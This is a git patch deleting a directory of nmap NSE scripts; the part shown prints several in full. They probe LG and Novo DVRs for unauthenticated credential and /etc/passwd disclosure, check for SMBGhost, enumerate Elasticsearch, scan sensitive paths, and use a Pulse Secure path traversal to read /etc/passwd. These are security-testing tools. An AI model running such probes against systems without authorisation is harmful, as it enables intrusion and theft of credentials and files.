From 5289648a6bef3bedc88b4b73d81ddcf08f8319b7 Mon Sep 17 00:00:00 2001 
From: InfoSec <1241112575@qq.com> Date: Wed, 27 Jan 2021 17:45:43 +0800 Subject: [PATCH] Delete nmap_scripts directory --- nmap_scripts/LG_Infoleak_v1.nse | 29 - nmap_scripts/LG_LFI.nse | 34 - nmap_scripts/Novo-credentials_disclosure.nse | 34 - nmap_scripts/cve-2020-0796.nse | 115 -- nmap_scripts/cve.nse | 34 - nmap_scripts/elasticsearch.nse | 67 - nmap_scripts/freevulnsearch.nse | 379 ------ nmap_scripts/http-middleware-path-finder.nse | 57 - nmap_scripts/http-pulse_ssl_vpn.nse | 82 -- nmap_scripts/http-vuln-CVE-2019-16759.nse | 88 -- nmap_scripts/http-vuln-cve2016-0870.nse | 180 --- nmap_scripts/http-vuln-cve2018-13379.nse | 129 -- nmap_scripts/http-wordpress-attachment.nse | 141 -- nmap_scripts/httpframe.nse | 115 -- nmap_scripts/infiltrator.nse | 1225 ------------------ nmap_scripts/irc-uncloak.nse | 172 --- nmap_scripts/manager.py | 81 -- nmap_scripts/philipshue-info.nse | 76 -- nmap_scripts/rdpScan.nse | 69 - nmap_scripts/struts2-scan.nse | 119 -- nmap_scripts/tomcat-cve-2017-12615.nse | 43 - nmap_scripts/trane-info.nse | 182 --- nmap_scripts/vulners.nse | 235 ---- nmap_scripts/weblogic-CNVD-C-2019-48814.nse | 88 -- nmap_scripts/weblogic-cve-2018-2894.nse | 87 -- nmap_scripts/wemo-info.nse | 144 -- nmap_scripts/wemo-switch.nse | 76 -- 27 files changed, 4081 deletions(-) delete mode 100644 nmap_scripts/LG_Infoleak_v1.nse delete mode 100644 nmap_scripts/LG_LFI.nse delete mode 100644 nmap_scripts/Novo-credentials_disclosure.nse delete mode 100644 nmap_scripts/cve-2020-0796.nse delete mode 100644 nmap_scripts/cve.nse delete mode 100644 nmap_scripts/elasticsearch.nse delete mode 100644 nmap_scripts/freevulnsearch.nse delete mode 100644 nmap_scripts/http-middleware-path-finder.nse delete mode 100644 nmap_scripts/http-pulse_ssl_vpn.nse delete mode 100644 nmap_scripts/http-vuln-CVE-2019-16759.nse delete mode 100644 nmap_scripts/http-vuln-cve2016-0870.nse delete mode 100644 nmap_scripts/http-vuln-cve2018-13379.nse delete mode 100644 
nmap_scripts/http-wordpress-attachment.nse delete mode 100644 nmap_scripts/httpframe.nse delete mode 100644 nmap_scripts/infiltrator.nse delete mode 100644 nmap_scripts/irc-uncloak.nse delete mode 100644 nmap_scripts/manager.py delete mode 100644 nmap_scripts/philipshue-info.nse delete mode 100644 nmap_scripts/rdpScan.nse delete mode 100644 nmap_scripts/struts2-scan.nse delete mode 100644 nmap_scripts/tomcat-cve-2017-12615.nse delete mode 100644 nmap_scripts/trane-info.nse delete mode 100644 nmap_scripts/vulners.nse delete mode 100644 nmap_scripts/weblogic-CNVD-C-2019-48814.nse delete mode 100644 nmap_scripts/weblogic-cve-2018-2894.nse delete mode 100644 nmap_scripts/wemo-info.nse delete mode 100644 nmap_scripts/wemo-switch.nse
diff --git a/nmap_scripts/LG_Infoleak_v1.nse b/nmap_scripts/LG_Infoleak_v1.nse
deleted file mode 100644
index ab42fcc..0000000
--- a/nmap_scripts/LG_Infoleak_v1.nse
+++ /dev/null
@@ -1,29 +0,0 @@
-local http require "http"
-local string require "string"
-local stdnse require "stdnse"
-local shortport require "shortport"
-
-
-description = [[
-. LG DVR LE6016D
-未认证远程获取用户/密码
-]]
-
-portrule = shortport.http
-
-
-action = function(host, port)
- local uri = "/dvr/wwwroot/user.cgi"
- local output = stdnse.output_table()
- local response = http.get(host, port, uri)
-
- if response.status == 200 then
- if string.find(response.body, "") ~= nil and string.find(response.body, "") ~= nil then
- output = "[+] Found vulnerable."
- else
- output = "[-] Not Found vulnerable."
- end
- end
- return output
-end
-
diff --git a/nmap_scripts/LG_LFI.nse b/nmap_scripts/LG_LFI.nse
deleted file mode 100644
index 297b3bf..0000000
--- a/nmap_scripts/LG_LFI.nse
+++ /dev/null
@@ -1,34 +0,0 @@
-local http require "http"
-local string require "string"
-local stdnse require "stdnse"
-local shortport require "shorport"
-
-
-description = [[
-Desc:LG DVR LE6016D存在敏感信息泄露漏洞,
-未认证用户只需要发起一个请求链接即可访问系统敏感文件,
-如/etc/passwd, /etc/shadow
-Tested:LG DVR LE6016D
-]]
-
-
-author = "seaung"
-
-
-portrule = shortport.http
-
-action = function(host, port)
- local output = stdnse.output_table()
- local url = "/etc/passwd"
- local response = http.get(host, port, url)
-
- if response.status == 200 then
- if string.find(response.body, "root") ~= nil then
- output = "[+] Found vulnerable."
- else
- output = "[-] Not Found vulnerable."
- end
- end
- return output
-end
-
diff --git a/nmap_scripts/Novo-credentials_disclosure.nse b/nmap_scripts/Novo-credentials_disclosure.nse
deleted file mode 100644
index f56a83a..0000000
--- a/nmap_scripts/Novo-credentials_disclosure.nse
+++ /dev/null
@@ -1,34 +0,0 @@
-local http require "http"
-local string require "string"
-local stdnse require "stdnse"
-local shortport require "shortport"
-
-description = [[
- Desc:Novo DVR存在凭证泄露问题,
- 攻击者精心构造链接,
- 修改cookie信息即可查看返回的登录凭证信息。
-]]
-
-author = "seaung"
-
-portrule = shortport.http
-
-action = function(host, port)
- local url = "/device.rsp?opt=user&cmd=list"
- local output = stdnse.output_table()
- local options = {headers={}}
- options["headers"]["cookie"] = "uid=admin"
-
- local response = http.get(host, port, url, options)
-
- if response.status == 200 then
- if string.find(response.body, "admin") ~= nil and string.find(response.body, "pwd") ~= nil then
- stdnse.debug1("[+] found vulnerable.")
- output = "[+] Found vulnerable."
- else
- stdnse.debug1("[-] not found vulnerable.")
- output = "[-] Not Found vulnerable."
- end
- end
- return output
-end
diff --git a/nmap_scripts/cve-2020-0796.nse b/nmap_scripts/cve-2020-0796.nse
deleted file mode 100644
index a7e1d36..0000000
--- a/nmap_scripts/cve-2020-0796.nse
+++ /dev/null
@@ -1,115 +0,0 @@ -local smb = require "smb" -local stdnse = require "stdnse" -local nmap = require "nmap" - -description = [[ -smb-protocols script modified to apply check for CVE-2020-0796 by psc4re. -Attempts to list the supported protocols and dialects of a SMB server. -NSE script to detect vulnerable CVE-2020-0796 issue, with Microsoft SMBv3 Compression (aka coronablue, SMBGhost) -The script is a modified version of smb-protocols.nse script -with a modified output data for v3.11 detection and validating CVE-2020-0796. -Note: This script just safe checks for CVE-2020-0796 vulnerability on SMBv3 and doesn't attempt anything beyond that. - -Packet check based on https://github.com/ollypwn/SMBGhost/ -The script attempts to initiate a connection using the dialects: -* NT LM 0.12 (SMBv1) -* 2.02 (SMBv2) -* 2.10 (SMBv2) -* 3.00 (SMBv3) -* 3.02 (SMBv3) -* 3.11 (SMBv3) - -Additionally if SMBv1 is found enabled, it will mark it as insecure. This -script is the successor to the (removed) smbv2-enabled script. - - -#git clonehttps://github.com/pr4jwal/CVE-2020-0796 -#cp cve-2020-0796.nse /usr/share/nmap/scripts/`` -#nmap --script-updatedb -#nmap -p445 --script cve-2020-0796 <>`` - -Checks for compression based on https://github.com/ollypwn/SMBGhost/ -Could've been done utilizing smb.lua in the nselib -but it required substantial editing of the functions, went with sockets. - -]] - ---- --- @usage nmap -p445 --script smb-protocols --- @usage nmap -p139 --script smb-protocols --- --- @output --- | smb-protocols: --- | dialects: --- | NT LM 0.12 (SMBv1) [dangerous, but default] --- | 2.02 --- | 2.10 --- | 3.00 --- | 3.02 --- |_ 3.11 (SMBv3.11) compression algorithm - Vulnerable to CVE-2020-0796 SMBGhost --- --- @xmloutput --- --- NT LM 0.12 (SMBv1) [dangerous, but default] --- 2.02 --- 2.10 --- 3.00 --- 3.02 --- 3.11 (SMBv3.11) [Potentially Vulnerable to CVE-2020-0796 Coronablue] ---
---- - -author = "Paulino Calderon (Modified by Psc4re)" -license = "Same as Nmap--See https://nmap.org/book/man-legal.html" -categories = {"safe", "discovery"} - -hostrule = function(host) - return smb.get_port(host) ~= nil -end - -action = function(host,port) - local status, supported_dialects, overrides - local output = stdnse.output_table() - overrides = {} - status, supported_dialects = smb.list_dialects(host, overrides) - if status then - for i, v in pairs(supported_dialects) do -- Mark SMBv1 as insecure - if v == "NT LM 0.12" then - supported_dialects[i] = v .. " (SMBv1) [dangerous, but default]" - end - if v == "3.11" then - local msg - local response - local compresionalg - local comp - msg = '\x00\x00\x00\xc0\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\n\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00' - local socket = nmap.new_socket() - socket:set_timeout(3000) - socket:connect(host.ip,445) - socket:send(msg) - response,data = socket:receive() - compressionalg= string.sub(data,-2) - if compressionalg == "\x01\x00" then - comp = "LZNT1 compression algorithm - Vulnerable to CVE-2020-0796 SMBGhost" - elseif compressionalg == "\x02\x00" then - comp ="LZ77 compression algorithm - Vulnerable to CVE-2020-0796 SMBGhost" - elseif compressionalg == "\x00\x00" then - comp ="No Compression Not Vulnerable" - elseif compressionalg == 
"\x03\x00" then
- comp="LZ77+Huffman compression algorithm - Vulnerable to CVE-2020-0796 SMBGhost"
- end
- supported_dialects[i] = v .." " .. comp
- end
- end
- output.dialects = supported_dialects
- end
-
- if #output.dialects>0 then
- return output
- else
- stdnse.debug1("No dialects were accepted")
- if nmap.verbosity()>1 then
- return "No dialects accepted. Something may be blocking the responses"
- end
- end
-end
diff --git a/nmap_scripts/cve.nse b/nmap_scripts/cve.nse
deleted file mode 100644
index d118da6..0000000
--- a/nmap_scripts/cve.nse
+++ /dev/null
@@ -1,34 +0,0 @@
-description = [[
-CVE api to fetch vuln in detected service
-
-INSTALLATION
-
-$ git clone https://github.com/arpitrohela/nmap_nse.git
-$ cd nmap_nse/
-$ sudo cp cve.nse /usr/share/nmap/scripts/
-$ sudo nmap --script cve.nse 192.168.0.1 -p 80 -sV
-]]
-author = "Arpit Rohela"
-license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
-categories = {"vuln"}
-
-local http = require "http"
-
--- The Rule Section --
-portrule = function(host, port)
- return port.state == "open"
-end
-
--- The Action Section --
-action = function(host, port)
-
- local uri = "/api/search/httpd"
- local response = http.get("cve.circl.lu", port, uri)
-
- if ( response.status == 200 ) then
- return response.body
--- and port.version.product--
--- and type(port.version.version)--
- end
-
-end
diff --git a/nmap_scripts/elasticsearch.nse b/nmap_scripts/elasticsearch.nse
deleted file mode 100644
index 51c7296..0000000
--- a/nmap_scripts/elasticsearch.nse
+++ /dev/null
@@ -1,67 +0,0 @@ -description = [[ -Attempts to enumerate indices, plugins and cluster nodes on a target elasticsearch -exposing an unauthenticated HTTP port (default 9200/tcp) using the elasticsearch RESTful API. -Installation -$ git clone https://github.com/theMiddleBlue/nmap-elasticsearch-nse.git -$ cp nmap-elasticsearch-nse/elasticsearch.nse /usr/share/nmap/scripts/ -$ nmap --script=elasticsearch - -]] - -author = "theMiddle" - -license = "Same as Nmap--See https://nmap.org/book/man-legal.html" - -categories = {"discovery", "version"} - -local http = require "http" -local string = require "string" -local json = require "json" - -portrule = function(host, port) - return port.protocol == "tcp" and port.state == "open" -end - -action = function(host, port) - local uri = "/" - local response = http.get(host, port, uri) - if ( response.status == 200 ) then - if ( string.find(response.body, "You Know, for Search") ) then - local out = "by theMiddle (Twitter: @Menin_TheMiddle)\r\n\r\n" - out = out .. "found RESTful API\r\n" - err, esjson = json.parse(response.body) - - out = out .. "version: ".. esjson['version']['number'] .."\r\n" - - if esjson['cluster_name'] then - out = out .. "cluster name: " .. esjson['cluster_name'] .. "\r\n" - end - - out = out .. "\r\nIndices found in /_cat/indices:\r\n" - local resindices = http.get_url("http://"..host.ip..":"..port.number.."/_cat/indices?pri&v&h=health,index,docs.count") - out = out .. resindices.body - - out = out .. "\r\nPlugins found in /_cat/plugins:\r\n" - local resplugins = http.get_url("http://"..host.ip..":"..port.number.."/_cat/plugins") - out = out .. resplugins.body - - out = out .. "\r\nNodes found in /_cat/nodes:\r\n" - local resnodes = http.get_url("http://"..host.ip..":"..port.number.."/_cat/nodes") - out = out .. resnodes.body - - out = out .. 
"\r\nNodes process:\r\n" - local resprocess = http.get_url("http://"..host.ip..":"..port.number.."/_nodes/_all/process") - err, psjson = json.parse(resprocess.body) - - for key,value in pairs(psjson['nodes']) do - out = out .. " - Name: " .. value['name'] .. "\r\n" - out = out .. " - Transport Address: " .. value['transport_address'] .. "\r\n" - out = out .. " - Host: " .. value['host'] .. "\r\n" - out = out .. " - IP: " .. value['ip'] .. "\r\n" - out = out .. " - Version: " .. value['version'] .. "\r\n\r\n" - end - - return out - end - end -end diff --git a/nmap_scripts/freevulnsearch.nse b/nmap_scripts/freevulnsearch.nse deleted file mode 100644 index e8bcc93..0000000 --- a/nmap_scripts/freevulnsearch.nse +++ /dev/null 
@@ -1,379 +0,0 @@ --- Head --- Required NSE libraries - -local stdnse = require "stdnse" -local string = require "string" -local table = require "table" -local http = require "http" -local json = require "json" - --- Input Arguments - -local apipath = stdnse.get_script_args("freevulnsearch.apipath") -local notls = stdnse.get_script_args("freevulnsearch.notls") -local summary = stdnse.get_script_args("freevulnsearch.summary") -local xmlhtml = stdnse.get_script_args("freevulnsearch.xmlhtml") - -description = [[ - -project :https://github.com/OCSAF/freevulnsearch -This script [Version 1.1.8] allows you to automatically search for CVEs using the API of -https://www.circl.lu/services/cve-search/ in connection with the found CPEs -using the parameter -sV in NMAP. - -This script is part of the FreeOCSAF Project - https://freecybersecurity.org. -Use only with legal authorization and at your own risk! ANY LIABILITY WILL BE REJECTED! - -Thanks to cve-search.org and circl.lu for the ingenious api -and special thanks to the community for many useful ideas that speed up my coding! - -Realized functions: -Version 1.0 - Contains the basic functions to quickly find relevant CVEs. -Version 1.0.1 - Includes EDB and MSF in output and minor changes. -Version 1.0.2 - Special CPE formatting and output optimization. -Version 1.0.3 - Small adjustments -Version 1.1 - Support your own cve-search api-link - https:///api/cvefor/ -Version 1.1.1 - Adaptation to CVSS rating instead of OSSTMM - Input from the community, thanks -Version 1.1.2 - Special CPE formatting - Many thanks to Tore (cr33y) for testing. -Version 1.1.3b - Special CPE formatting - Many thanks to Tore (cr33y) for testing. -Version 1.1.4 - Optimization for OCSAF freevulnaudit.sh project. 
-Version 1.1.5 - Assignment to external category only -Version 1.1.6 - Adaptation API to http and tls as option -Version 1.1.6a - Adaptation API to tls and http as option -Version 1.1.7 - Optimized for nmap 7.80 -Version 1.1.8 - Optimized for cve-search api - -Future functions: -Version 1.2 - Shall contains optional sort by severity (CVSS) -Version 1.3 - Implementation of your useful ideas. - -Usage: -nmap -sV --script freevulnsearch - -Output explanation: -CVE-Number Rating CVSS EDB MSF CVE-Link - -CVE-Number: -Common Vulnerabilities and Exposures - -CVSS v3.0 Ratings: -Critical (CVSS 9.0 - 10.0) -High (CVSS 7.0 - 8.9) -Medium (CVSS 4.0 - 6.9) -Low (CVSS 0.1 - 3.9) -None (CVSS 0.0) - -CVSS: -Common Vulnerability Scoring System with with the level of severty from 0.0 - 10.0 - -EDB: -There is an exploit in the Exploit-DB.com - -MSF: -There is a module in the Metasploit Framework - -CVE-Link: -Additional information on the vulnerability found. - -]] - -author = "Mathias Gut" - -license = "Same as Nmap--See https://nmap.org/book/man-legal.html" - -categories = {"safe", "vuln", "external"} - --- @usage --- nmap -sV --script freevulnsearch [--script-args apipath=] --- nmap -sV --script freevulnsearch [--script-args notls=yes] --- nmap -sV --script freevulnsearch [--script-args summary=yes] --- nmap -sV --script freevulnsearch [--script-args xmlhmtl=yes] --- --- @output --- --- 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) --- | freevulnsearch: --- | CVE-2018-15473 Medium 5.0 EDB MSF https://cve.circl.lu/cve/CVE-2018-15473 --- | CVE-2017-15906 Medium 5.0 https://cve.circl.lu/cve/CVE-2017-15906 --- | CVE-2016-10708 Medium 5.0 https://cve.circl.lu/cve/CVE-2016-10708 --- | CVE-2010-4755 Medium 4.0 https://cve.circl.lu/cve/CVE-2010-4755 --- | CVE-2010-4478 High 7.5 https://cve.circl.lu/cve/CVE-2010-4478 --- | CVE-2008-5161 Low 2.6 https://cve.circl.lu/cve/CVE-2008-5161 --- |_ *CVE found with NMAP-CPE: (cpe:/a:openbsd:openssh:4.7p1) --- - --- Portrule - --- The 
table port.version contains the CPEs - -portrule = function(host, port) - local portv=port.version - return portv ~= nil and portv.version ~= nil -end - --- Function to check if a version number exists at the CPE -function func_check_cpe(cpe) - - _, count = string.gsub(cpe, ":", " ") - if count >= 4 then - return cpe - else - return 0 - end -end - --- Function to check for special CPE formatting. -function func_check_cpe_form(cpe) - - local cpe_form - local sub_form1 - local sub_form2 - local sub_form3 - local cpe_front - local cpe_version - - _, count1 = string.gsub(cpe, ":httpfileserver:", " ") - _, count2 = string.gsub(cpe, ".*:.*:.*:.*:.*-", " ") - _, count3 = string.gsub(cpe, ".*:.*:.*:.*:.*_", " ") - _, count4 = string.gsub(cpe, ".*:.*:.*:.*:.*%..*%.%d%a%d", " ") - _, count5 = string.gsub(cpe, ".*:.*:.*:.*:.*%a%d", " ") - _, count6 = string.gsub(cpe, ".*:.*:.*:.*:.*%d%a", " ") - - if count1 ~= 0 then - cpe_form = string.gsub(cpe,"httpfileserver","http_file_server") - return cpe_form - elseif count2 ~= 0 then -- (MySQL) 5.0.51a-3ubuntu5 -to- 5.0.51a - sub_form1 = string.gsub(cpe,".*:",":") - cpe_version = string.gsub(sub_form1,"-.*","") - cpe_front = string.gsub(cpe,cpe_version .. ".*","") - cpe_form = cpe_front .. cpe_version - return cpe_form - elseif count3 ~= 0 then -- (Exim smtpd) 4.90_1 -to- 4.90 - sub_form1 = string.gsub(cpe,".*:",":") - cpe_version = string.gsub(sub_form1,"_.*","") - cpe_front = string.gsub(cpe,cpe_version .. ".*","") - cpe_form = cpe_front .. cpe_version - return cpe_form - elseif count4 ~= 0 then -- (OpenSSH) 6.6.1p1 -to- 6.6:p1 - sub_form1 = string.gsub(cpe,".*:",":") - sub_form2 = string.gsub(sub_form1,"%.%d%a%d.*","") - sub_form3 = string.gsub(sub_form1,".*%.%d","") - cpe_version = sub_form2 .. ":" .. sub_form3 - cpe_front = string.gsub(cpe,sub_form1,"") - cpe_form = cpe_front .. 
cpe_version - return cpe_form - elseif count5 ~= 0 then -- (OpenSSH) 7.5p1 -to- 7.5:p1 - sub_form1 = string.gsub(cpe,".*:",":") - sub_form2 = string.gsub(sub_form1,"%a.*","") - sub_form3 = string.gsub(sub_form1,sub_form2,"") - cpe_version = sub_form2 .. ":" .. sub_form3 - cpe_front = string.gsub(cpe,sub_form1,"") - cpe_form = cpe_front .. cpe_version - return cpe_form - elseif count6 ~= 0 then -- (ProFTPD) 1.3.5a -to- 1.3.5 - sub_form1 = string.gsub(cpe,".*:",":") - sub_form2 = string.gsub(sub_form1,"%d.*","") - cpe_version = string.gsub(sub_form1,sub_form2,"") - cpe_front = string.gsub(cpe,sub_form1,"") - cpe_form = cpe_front .. cpe_version - return cpe_form - else - return 0 - end -end - --- Function to check for known vulnerabilities without CVE -function func_check_known_vuln(cpe) - - local cpe_vuln - - if cpe == "cpe:/a:vsftpd:vsftpd:2.3.4" then - cpe_vuln = "EDB-ID-17491\t" .. "Critical\t" .. "None\t" .. "EDB MSF\t" .. "https://www.exploit-db.com/exploits/17491" - return cpe_vuln - else - return 0 - end -end - --- Function to query CVEs via CPEs with API (circl.lu). -function func_check_cve(cpe) - - local url - local option = { - max_body_size=40000000, - timeout=40000 - } - local response - local request - local status - local vulnerabilities - - if not apipath then - if not notls then - url = "https://cve.circl.lu/api/cvefor/" - else - url = "http://cve.circl.lu/api/cvefor/" - end - else - url = apipath - end - - request = url .. cpe - - response = http.get_url(request, option) - - status, vulnerabilities = json.parse(response.body) - - if status ~= true then - return 1 - elseif type(next(vulnerabilities)) == "nil" then - return 2 - elseif (status == true and vulnerabilities ~= "") then - return func_output(vulnerabilities) - else - return 2 - end -end - --- Function to generate the script output. 
-function func_output(vulnerabilities) - - local output_table = {} - local input_table = {} - local cve_url= "https://cve.circl.lu/cve/" - local cve_value - local cvss - local cvss_value - local cvss_rating - local url_value - local edb - local msf - local exploit - local sum - local cwe - local xmlhtml_out - local i - local t - - if not xmlhtml then - xmlhtml_out = "" - else - xmlhtml_out = " " - end - - for i,t in ipairs(vulnerabilities) do - cve_value = t.id - cvss = tonumber(t.cvss) - url_value = cve_url .. t.id - if t.refmap then - edb = t.refmap["exploit-db"] - msf = t.refmap.metasploit - end - - if not cvss then - cvss_value = "None" - cvss_rating = "None" - else - cvss_value = cvss - cvss_rating = func_rating(cvss) - end - - if not edb and not msf then - exploit = "" - elseif edb and not msf then - exploit = "EDB" - elseif not edb and msf then - exploit = "MSF" - elseif edb and msf then - exploit = "EDB MSF" - end - - if not summary then - output_table = cve_value .. xmlhtml_out .. "\t" .. cvss_rating .. "\t" .. cvss_value .. "\t" .. exploit .. "\t" .. url_value - else - sum = t.summary - - if not t.cwe then - output_table = cve_value .. xmlhtml_out .. "\t" .. cvss_rating .. "\t" .. cvss_value .. "\t" .. exploit .. "\t" .. url_value .. - "\n *SUMMARY: " .. sum .. "\n" - else - cwe = t.cwe - output_table = cve_value .. xmlhtml_out .. "\t" .. cvss_rating .. "\t" .. cvss_value .. "\t" .. exploit .. "\t" .. url_value .. - "\n *CWE: " .. cwe .. - "\n *SUMMARY: " .. sum .. 
"\n" - end - end - - input_table[i] = output_table - end - - return input_table -end - --- Function to assign CVSS values to CVSS V3.0 ratings -function func_rating(cvss) - - if (cvss == 0.0) then - return "None\t" - elseif (3.9 >= cvss and cvss >= 0.1) then - return "Low\t" - elseif (6.9 >= cvss and cvss >= 4.0) then - return "Medium\t" - elseif (8.9 >= cvss and cvss >= 7.0) then - return "High\t" - elseif (10.0 >= cvss and cvss >= 9.0) then - return "Critical" - end -end - - --- Action --- Main-Function -action = function(host, port) - - local cpe="" - local check - local sort_values - local form_cpe - local known_vuln - local i - - for i, cpe in ipairs(port.version.cpe) do - check = func_check_cpe(cpe) - if check ~= 0 then - sort_values = func_check_cve(check) - if sort_values == 1 then - return "*Error with API query. API or network possibly not available." - elseif sort_values == 2 then - form_cpe = func_check_cpe_form(check) - if form_cpe == 0 then - known_vuln = func_check_known_vuln(check) - if known_vuln == 0 then - return "\n *No CVE found with NMAP-CPE: (" .. check .. ")" .. - "\n *Check other sources like https://www.exploit-db.com" - else - return "\n " .. known_vuln .. "\n *No CVE found with CPE: (" .. check .. ")" - end - else - sort_values = func_check_cve(form_cpe) - if sort_values == 2 then - return "\n *No CVE found with NMAP-CPE: (" .. check .. ")" .. - "\n *No CVE found with freevulnsearch function: (" .. form_cpe .. ")" .. - "\n *Check other sources like https://www.exploit-db.com" - else - table.sort(sort_values, function(a, b) return a>b end) - table.insert(sort_values, "*No CVE found with NMAP-CPE: (" ..check .. ")") - table.insert(sort_values, "*CVE found with freevulnsearch function: (" .. form_cpe .. ")") - return sort_values - end - end - else - table.sort(sort_values, function(a, b) return a>b end) - table.insert(sort_values, "*CVE found with NMAP-CPE: (" ..check .. 
")")
- return sort_values
- end
- elseif check == 0 then
- return "\n *Check unspecific version manually: (".. cpe .. ")"
- end
- end
-end
diff --git a/nmap_scripts/http-middleware-path-finder.nse b/nmap_scripts/http-middleware-path-finder.nse
deleted file mode 100644
index fb67cab..0000000
--- a/nmap_scripts/http-middleware-path-finder.nse
+++ /dev/null
@@ -1,57 +0,0 @@
-local http = require "http"
-local shortport = require "shortport"
-local string = require "string"
-local stdnse = require "stdnse"
-
-
-description = [[
- A middleware sensitive directory scan script
-$ git clone https://github.com/Rvn0xsy/nse_vuln.git
-$ cd /nse_vuln/
-$ sudo cp * /usr/share/nmap/scripts/
-$ sudo nmap -n -p 443 --script http-middleware-path-finder.nse victim_host
-]]
-
-author = "Rvn0xsy@gmail.com"
-license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
-categories = {"default"}
-blog = "https://payloads.online"
--- Precision mode
--- portrule = shortport.port_or_service( {80, 443, 8080, 7001}, {"http", "https"}, "tcp", "open")
-
-portrule = shortport.service({"http","https"},"tcp","open")
-
-action = function(host, port)
- out = stdnse.output_table()
- local status, result , body = http.identify_404(host,port)
- local all = nil
- request_paths = {
- "/phpinfo.php",
- "/manager/html",
- "/_async/AsyncResponseService",
- "/console/login/LoginForm.jsp",
- "/phpmyadmin/",
- "/web-console",
- "/jmx-console",
- "/host-manager",
- "/status",
- "/logs/access_log",
- "/jonasAdmin/",
- "/ibm/console/logon.jsp"
-}
-
- for key,value in ipairs(request_paths)
- do
- all = http.pipeline_add(value,nil,all,'GET')
- end
-
- local results = http.pipeline_go(host, port, all)
-
- for num,res in ipairs(results)do
- if(res.status ~= result)then
- out[num] = request_paths[num]
- end
- end
-
- return out
-end
\ No newline at end of file
diff --git a/nmap_scripts/http-pulse_ssl_vpn.nse b/nmap_scripts/http-pulse_ssl_vpn.nse
deleted file mode 100644
index af1695f..0000000
--- a/nmap_scripts/http-pulse_ssl_vpn.nse
+++ /dev/null
@@ -1,82 +0,0 @@ -description = [[ -Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. -This exploit reads /etc/passwd as a proof of concept -This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4) - -INSTALLATION -$ git clone https://github.com/r00tpgp/http-pulse_ssl_vpn.nse.git -$ cd http-pulse_ssl_vpn.nse/ -$ sudo cp http-pulse_ssl_vpn.nse /usr/share/nmap/scripts/ -$ sudo nmap -n -p 443 --script http-pulse_ssl_vpn -n victim_host -]] - -local http = require "http" -local shortport = require "shortport" -local vulns = require "vulns" -local stdnse = require "stdnse" -local string = require "string" - ---- --- @usage --- nmap -p --script pulse_ssl_vpn --- --- @output --- PORT STATE SERVICE --- s4430/tcp open http --- | http-vuln-cve2019-11510: --- | VULNERABLE --- | Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests --- | State: VULNERABLE --- | IDs: CVE:CVE-2019-11510 --- | --- | Disclosure date: 2019-04-24 --- | References: --- | http://www.securityfocus.com/bid/108073 --- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510 --- |_ http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html --- --- @args http-vuln-cve2019-11510.method The HTTP method for the request. The default method is "GET". --- @args http-vuln-cve2019-11510.path The URL path to request. The default path is "/". - -author = "r00tpgp" -license = "Same as Nmap--See https://nmap.org/book/man-legal.html" -categories = { "vuln" } - -portrule = shortport.http - -action = function(host, port) - local vuln = { - title = "Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests", - state = vulns.STATE.NOT_VULN, - description = [[ -Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. 
-This exploit reads /etc/passwd as a proof of concept -This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 - ]], - IDS = { - CVE = "CVE-2019-11510" - }, - references = { - 'http://www.securityfocus.com/bid/108073', - 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510', - 'http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html' - }, - dates = { - disclosure = { year = '2019', month = '04', day = '24' } - } - } - - -- Send a simple GET request to the server, if it returns appropiate string, then you have a vuln host - options = {header={}} options['header']['User-Agent'] = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" - --local req = http.get(host, port, uri, options) - local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) - local url = stdnse.get_script_args(SCRIPT_NAME..".url") or "/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/" - local response = http.generic_request(host, port, "GET", "/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/", options) - - if response.status == 200 and string.match(response.body, "root:x:0:0:root:/:/bin/bash") then - -- if response.status == 200 then - vuln.state = vulns.STATE.VULN - end - - return vuln_report:make_output(vuln) -end diff --git a/nmap_scripts/http-vuln-CVE-2019-16759.nse b/nmap_scripts/http-vuln-CVE-2019-16759.nse deleted file mode 100644 index 22ed8a4..0000000 --- a/nmap_scripts/http-vuln-CVE-2019-16759.nse +++ /dev/null 
